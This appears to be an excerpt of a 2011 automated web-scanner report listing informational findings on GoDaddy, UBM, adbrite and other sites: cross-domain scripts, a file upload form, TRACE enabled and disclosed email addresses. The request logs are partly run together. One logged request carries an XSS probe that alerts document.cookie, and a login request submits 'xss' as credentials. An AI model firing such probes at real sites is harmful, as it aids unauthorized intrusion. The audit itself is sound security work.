GET /lpages/od-smtp-service?ctt_id=3448125&ctt_adnw=Google&ctt_kw=SMTP%20server&ctt_ch=ps&ctt_entity=tc&ctt_adid=7890931031&ctt_nwtype=search&ctt_cli=8x11767x88739x778008&gclid=CJKar_KJoqsCFRpggwodHTRzEg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK420f4303ae360"/html4/loose.dtd">...[SNIP]... <script type="text/javascript" src="//static.woopra.com/js/woopra.v2.js"> </script>...[SNIP]...
16.87. http://www.stumbleupon.com/badge/embed/1/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.stumbleupon.com
Path:
/badge/embed/1/
Issue detail
The response dynamically includes the following script from another domain:http://cdn.stumble-upon.com/js/badge_su.js?v=20110909-00
Request
GET /badge/embed/1/?url=http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html HTTP/1.1/2011/09/godaddy-websites-compromised-with.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www...[SNIP]... -upon.com/css/badges_su.css?v=20110909-00" type="text/css" media="screen, projection" /><script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110909-00"> </script>...[SNIP]...
16.88. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.thewhir.com
Path:
/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0609.js http://platform.linkedin.com/in.js http://platform.twitter.com/widgets.js https://apis.google.com/js/plusone.js
Request
GET /web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... <script type="text/javascript" src="https://apis.google.com/js/plusone.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <script type="text/javascript" src="http://platform.linkedin.com/in.js"> </script>...[SNIP]... <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0609.js"> </script>...[SNIP]...
16.89. http://www.ubm.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.90. http://www.ubm.com/en/people/jobshop.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/people/jobshop.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/people/jobshop.aspx HTTP/1.1/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help%20contact/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.4.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.91. http://www.ubm.com/en/people/ubm-people.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/people/ubm-people.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/people/ubm-people.aspx HTTP/1.1-businesses.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.2.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.92. http://www.ubm.com/en/site-services/search/search-result.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/search-result.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help%20contact HTTP/1.1/people/ubm-people.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.3.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.93. http://www.ubm.com/en/stylesheets/.~/media/Images/U/United-Business-Media-Plc/Images/business-banner/cursors/cursor_arrow_left.cur
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/stylesheets/.~/media/Images/U/United-Business-Media-Plc/Images/business-banner/cursors/cursor_arrow_left.cur
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/stylesheets/.~/media/Images/U/United-Business-Media-Plc/Images/business-banner/cursors/cursor_arrow_left.cur HTTP/1.1-businesses.aspx;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.1.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 404 File not found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.94. http://www.ubm.com/en/ubm-businesses.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/ubm-businesses.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/ubm-businesses.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.1.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.95. http://www.youtube.com/embed/lIEF1xCAvxo
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.youtube.com
Path:
/embed/lIEF1xCAvxo
Issue detail
The response dynamically includes the following script from another domain:http://s.ytimg.com/yt/jsbin/www-embed_core_module-vfls7Qr1c.js
Request
GET /embed/lIEF1xCAvxo?rel=0 HTTP/1.1/default.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3_pXTnp7lsc; PREF=fv=10.3.183
Response
HTTP/1.1 200 OK/yt/cssbin/www-embed-vfl6DvbkH.css">...[SNIP]... <script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vfls7Qr1c.js"> </script>...[SNIP]...
17. File upload functionality
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mediacdn.disqus.com
Path:
/1316112938/build/system/upload.html
Issue detail
The page contains a form which is used to submit a user-supplied file to the following URL:http://mediacdn.disqus.com/1316112938/build/system/upload.html
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:File path traversal Persistent cross-site scripting Placing of other client-executable code into the domain Transmission of viruses and other malware Denial of service Whether uploaded content can subsequently be downloaded via a URL within the application. What Content-type and Content-disposition headers the application returns when the file's content is downloaded. Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed. Whether the application performs any filtering on the file extension or MIME type of the uploaded file. Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file). What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location. Whether archive formats such as ZIP are unpacked by the application. How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:Use a server-generated filename if storing uploaded files on disk. Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks. Enforce a whitelist of accepted, non-executable file extensions. If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment. Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration. Reject attempts to upload archive formats such as ZIP.
Request
GET /1316112938/build/system/upload.html HTTP/1.1/2011/09/godaddy-websites-compromised-with.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3822849; __qca=P0-943627109-1315055753168; sessionid=ebeeeac597d2aa02500a0fdc973b4e14; __utma=113869458.1840189074.1315055753.1315760571.1316054545.12; __utmz=113869458.1316054545.12.12.utmcsr=gossipcop.com|utmccn=(referral)|utmcmd=referral|utmcct=/scarlett-johansson-naked-pics-leak-nude-pictures-photos-leaked-scarlet-johanson-johansen-hacked-real-fake/
Response
HTTP/1.1 200 OK,object,ifram...[SNIP]... <input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" /> ...[SNIP]...
18. TRACE method is enabled
previous
next
There are 4 instances of this issue:
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
Issue remediation
The TRACE method should be disabled on the web server.
18.1. https://livechat.iadvize.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://livechat.iadvize.com
Path:
/
Request
TRACE / HTTP/1.0c782cf59ae45a110
Response
HTTP/1.1 200 OKc782cf59ae45a110 ; 5502_idzp=%7B%22origin_site%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp+server%22%2C%22origin%22%3A%22search+engine%22%2C%22refengine%22%3A%22Goo...[SNIP]...
18.2. https://login.secureserver.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Request
TRACE / HTTP/1.023db99283763a0ef
Response
HTTP/1.1 200 OK23db99283763a0ef
18.3. http://mailjet.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mailjet.com
Path:
/
Request
TRACE / HTTP/1.08e1319bd44003b83
Response
HTTP/1.1 200 OK8e1319bd44003b83 ; affiliate=US-EN-smtp; __utma=176514170.637056612.1316204845.1316204845.1316204845.1; __utmb=176514170.1.10.1316204845; __utmc=176514170; __utmz=176514170.1316204845.1.1.utmgclid=CKqV0feJoqsCFQdzgwod6...[SNIP]...
18.4. http://www.authsmtp.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.authsmtp.com
Path:
/
Request
TRACE / HTTP/1.0481f69b92853cb8c
Response
HTTP/1.1 200 OK481f69b92853cb8c
19. Email addresses disclosed
previous
next
There are 65 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
19.1. http://bstats.adbrite.com/click/bstats.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://bstats.adbrite.com
Path:
/click/bstats.gif
Issue detail
The following email address was disclosed in the response:4e737a2c@www.drugstore.com
Request
GET /click/bstats.gif?kid=46037273&bapid=7622&uid=740987 HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1+1312290886x-1235322650"; ut="1%3AJcxLCoAgFEDRvbyxgwyKcDdWGml%2BC0167r3f9HK4F6QW2AValOzivAOD6PomIc3DIBVSbIj3x%2BGQJtn75QtRhK1Dejpuwi%2BsKvIRk9fmDUBg5NaKuH5HqPUG"; rb2=EAE; vsd=0@1@4e7379a2@www.drugstore.com; srh="1%3Aq64FAA%3D%3D"
Response
HTTP/1.1 200 OKd9nrLkrDGG%2FjpwxRKynGend0e%2Babc0MsoLnBqCs5P%2BzQgHcVjyRSXeuZBHGGGIIjEXWFYw5ebUtJ4nTtZkiSPBja%2BdIf6dGsPwEGXWut8lNewvO8"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:32:44 GMT4e737a2c@www.drugstore.com ; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:32:44 GMT.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"..,........@..D.;
19.2. http://bstats.adbrite.com/click/bstats.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://bstats.adbrite.com
Path:
/click/bstats.gif
Issue detail
The following email address was disclosed in the response:4e7379a2@www.drugstore.com
Request
GET /click/bstats.gif?kid=46037273&bapid=7622&uid=740987 HTTP/1.1/*;q=0.5;q=0.7+1312290886x-1235322650"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirKNzMoqzEst7BIy6oxrDHQKSgoKcmvMSxLMytIhwjkZVWmAQWSC7JzQQJKOkpJiXl5qUWZYAOUamsB"; rb2=ChwKBjcxMjE1NhiVssXtMSIMZ2w5OWloMGoweHFuCjwKBjcxMjE4MRip_KKIMiIsV1g5cVpWZDJUWFZFQm1OZUFRWnlYQUpRYVhzUWRBRkJERmxwVlZGT1lBPT0KIwoGNzQyNjk3GPfN-pYuIhM5MDMzNDQyMzIwOTE2MDg3NjM0EAE; rb="0:712156:20838240:gl99ih0j0xqn:0:712181:20838240:WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==:0:742697:20828160:9033442320916087634:0"
Response
HTTP/1.1 200 OKu8y6RQZJeBsrjTQdtbDC6e6V28%2FjF8gdiAJW3SemeQcBCXmbiZ3DoA0xapsQjgOJZc3DUkNSceuJXShdpO4X3tz6E1Ow7hfQwCi9V2mtR3ieFw%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:30:26 GMT4e7379a2@www.drugstore.com ; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:30:26 GMT.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"..,........@..D.;
19.3. http://help.securepaynet.net/javascripts/lib/controls.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://help.securepaynet.net
Path:
/javascripts/lib/controls.js
Issue detail
The following email address was disclosed in the response:
Request
GET /javascripts/lib/controls.js HTTP/1.1.net/topic/168/article/5246?plid=;q=0.3
Response
HTTP/1.1 200 OKc419400"...[SNIP]... tdd@tddsworld.com >...[SNIP]...
19.4. http://httpd.apache.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://httpd.apache.org
Path:
/
Issue detail
The following email address was disclosed in the response:
Request
GET / HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server#pq=smtp+server&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=2&gs_id=7&xhr=t&q=web+server&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=we+server&aq=0c&aqi=g-c4&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1147&bih=870/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK86f580-gzip"/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... docs@httpd.apache.org " />...[SNIP]...
19.5. http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://i.ubm-us.net
Path:
/shared/omniture/ubm_h_s_code_remote.js
Issue detail
The following email address was disclosed in the response:
Request
GET /shared/omniture/ubm_h_s_code_remote.js HTTP/1.1;q=0.3
Response
HTTP/1.1 200 OK"...[SNIP]... ,0,id,ta);qs`e;`Wm"`e}^7(qs);^z`p(@h;`l@h`L^9,`G$61',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$w)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc #Btc=1;s.flush`a()}`2$l`Atl`0o,t,n,".`N`i=n;s.t(@h}`5pg){`F@0co`0o){`K@J\"_\",1,#A`2@vo)`Awd@0gs`0$S{`K@J$o1,#A`2s.t()`Awd@0dc`0$S{`K@J$o#A`2s.t()}}@3=(`F`J`Y`8`4@ts@d0`Rd=^L...[SNIP]...
19.6. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The following email addresses were disclosed in the response:YourEmail@YourWebsite.com marketing@godaddy.com sitesuggestions@godaddy.com
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... _signup()',event);" value="YourEmail@YourWebsite.com " onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com ?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com </a>...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com ?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com </a>...[SNIP]...
19.7. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The following email addresses were disclosed in the response:YourEmail@YourWebsite.com marketing@godaddy.com sitesuggestions@godaddy.com
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... _signup()',event);" value="YourEmail@YourWebsite.com " onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com ?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com </a>...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com ?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com </a>...[SNIP]...
19.8. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The following email addresses were disclosed in the response:YourEmail@YourWebsite.com marketing@godaddy.com sitesuggestions@godaddy.com
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... _signup()',event);" value="YourEmail@YourWebsite.com " onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com ?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com </a>...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com ?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com </a>...[SNIP]...
19.9. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://img3.wsimg.com
Path:
/pc/js/1/gd_js_20110817.min.js
Issue detail
The following email address was disclosed in the response:YourEmail@YourWebsite.com
Request
GET /pc/js/1/gd_js_20110817.min.js HTTP/1.1;q=0.3
Response
HTTP/1.1 200 OK.toLowerCase();var pcj_isIe=agt.indexOf("msie")!=-1;var pcj_isIe6under=false;if(pcj_isIe){pcj_isIe6under=(agt.indexOf("msie 6")!=-1||agt.indexOf("msie 5")!=-1...[SNIP]... gation){a.stopPropagation()}if(a.preventDefault){a.preventDefault()}return false}function pcj_vemail(d){var c=true;var a=-1;var b=-1;if(c){tmp=d;a=tmp.indexOf("@");if((a>0)&&(tmp!="YourEmail@YourWebsite.com ")&&(tmp.length<=500)){b=tmp.indexOf(".",a);if(tmp.length<=b+2){c=false}}else{c=false}}return c}function pcj_signup(){var a=document.getElementById("pcf_email");if(a.value.length>...[SNIP]...
19.10. http://labs.opera.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://labs.opera.com
Path:
/
Issue detail
The following email address was disclosed in the response:29BA08F9-96C7-44BC-BE23-9E163E5D8DEA@apple.com
Request
GET / HTTP/1.1/company//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en...[SNIP]... /mid/29BA08F9-96C7-44BC-BE23-9E163E5D8DEA@apple.com ">...[SNIP]...
19.11. http://livechat.iadvize.com/chat_init.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/chat_init.js
Issue detail
The following email addresses were disclosed in the response:idzelie@iadvize.com idzmailjetc@iadvize.com watch.999@iadvize.com
Request
GET /chat_init.js?sid=1821 HTTP/1.1/features/smtp-relay-service.html?gclid=CKqV0feJoqsCFQdzgwod6j2wjw;q=0.3
Response
